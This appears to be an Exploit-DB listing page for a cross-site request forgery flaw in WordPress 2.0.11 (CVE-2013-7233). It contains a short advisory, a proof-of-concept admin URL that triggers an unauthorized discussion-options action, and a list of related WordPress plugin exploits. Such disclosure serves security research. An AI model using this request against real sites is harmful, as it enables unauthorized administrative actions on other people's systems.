Exploit

EDB-ID: 38924	Author: MustLive	Published: 2013-12-17
CVE: CVE-2013-7233	Type: Webapps	Platform: PHP
Aliases: N/A	Advisory/Source: Link	Tags: Vulnerability
E-DB Verified:	Exploit: Download / View Raw	Vulnerable App:

« Previous Exploit Next Exploit »

source: http://www.securityfocus.com/bid/64564/info

WordPress is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

WordPress 2.0.11 is vulnerable.

http://www.example.com/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1

Related Exploits

Trying to match CVEs (1): CVE-2013-7233
Trying to match OSVDBs (1): 101184
Trying to match setup file: caa62170e15c30cbed58be4f29556968
Other Possible E-DB Search Terms: WordPress 2.0.11, WordPress

Date	Title	Author
2009-11-10	WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting	Juan Galian...
2011-03-08	WordPress Plugin 1 Flash Gallery 0.2.5 - Cross-Site Scripting / SQL Injection	High-Tech B...
2012-05-15	WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities	Heine Pedersen
2016-12-19	WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection	Ahmed Sherif
2012-09-26	WordPress Plugin ABC Test - 'id' Parameter Cross-Site Scripting	Scott Herbert
2010-12-22	WordPress Plugin Accept Signups 0.1 - 'email' Parameter Cross-Site Scripting	clshack
2016-05-04	WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting	Johto Robbie
2013-05-27	WordPress Plugin ADIF Log Search Widget - 'logbook_search.php' Cross-Site Scripting	k3170makan
2015-10-18	WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload	PizzaHatHacker
2012-10-01	WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities	Tapco Security
2017-03-09	WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download	Ihsan Sencan
2017-03-09	WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection	Ihsan Sencan
2011-09-14	WordPress Plugin Auctions 1.8.8 - 'wpa_id' Parameter SQL Injection	sherl0ck_
2011-01-23	WordPress Plugin Audio 0.5.1 - 'showfile' Parameter Cross-Site Scripting	AutoSec Tools
2011-02-28	WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities	Danilo Massa
2013-03-25	WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection	Fernando A....
2011-06-26	WordPress Plugin Beer Recipes 1.0 - Cross-Site Scripting	TheUzuki.'
2011-01-25	WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Parameter Cross-Site Scripting	AutoSec Tools
2016-08-01	WordPress Plugin Booking Calendar 6.2 - SQL Injection	Edwin Molenaar
2016-02-08	WordPress Plugin Booking Calendar Contact Form 1.0.23 - Multiple Vulnerabilities	i0akiN SEC-...
2016-01-25	WordPress Plugin Booking Calendar Contact Form 1.1.23 - Unauthenticated SQL Injection	i0akiN SEC-...
2016-01-27	WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection	i0akiN SEC-...
2016-01-27	WordPress Plugin Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities	i0akiN SEC-...
2011-07-11	WordPress Plugin bSuite 4.0.7 - Multiple HTML Injection Vulnerabilities	IHTeam
2011-09-26	WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscri...	knull

WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery

Related Exploits